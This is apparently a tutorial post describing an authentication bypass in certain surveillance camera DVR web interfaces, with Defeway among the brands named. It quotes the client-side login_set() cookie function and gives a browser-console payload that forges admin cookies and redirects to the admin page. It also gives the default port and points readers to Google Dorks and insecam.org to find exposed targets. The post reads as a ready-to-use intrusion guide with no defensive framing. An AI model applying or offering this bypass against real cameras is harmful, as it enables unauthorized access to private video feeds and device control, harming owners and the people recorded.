As the title indicates, some surveillance camera models are accessible (admin access) without a password.
The vulnerable models are multiple. One can mention the brand Defeway for example. The flaw comes from the embedded system, more precisely from the web server and its authentication system.
These cameras are recognizable thanks to their web interface that looks like this:
NVR camera video client web interface connection
For your information, the default port is 60001.
To access the admin interface, simply call a javascript function: login_set() which is located in /js/cookie.js;
Here is his code:
function login_set(usr,pwd,iSetAble,iPlayBack){ pwd = !pwd ? 'null' : pwd; Cookies.set("dvr_usr", usr); Cookies.set("dvr_pwd", pwd); Cookies.set("iSetAble", iSetAble); Cookies.set("iPlayBack", iPlayBack); }
You will have noticed that the function is not responsible for checking the data. It only writes the 4 cookies with the data provided to it.
Among these data:
- dvr_usr: username: "admin" by default but another value also works.
- dvr_pwd: Completely fictitious password we don't care
- iSetAble: 1 for admin
- iPlayBack: 1 To be able to view the video streams
Once on the authentication page, we open the development or javascript console (F12 on most browsers). Then we insert the following code:
login_set('admin','pawned',1,1);document.location="/view2.html";
The first line creates the authentication cookies, the second redirects you to the admin page. For the first line, we could have also done this:
login_set(1,1,1,1);
then type in the address bar: http://ip_target:port/view2.html
Executing the authentication script...
Displaying the admin page once done...
You can find these cameras via "Google Dorks" or simply via insecam.org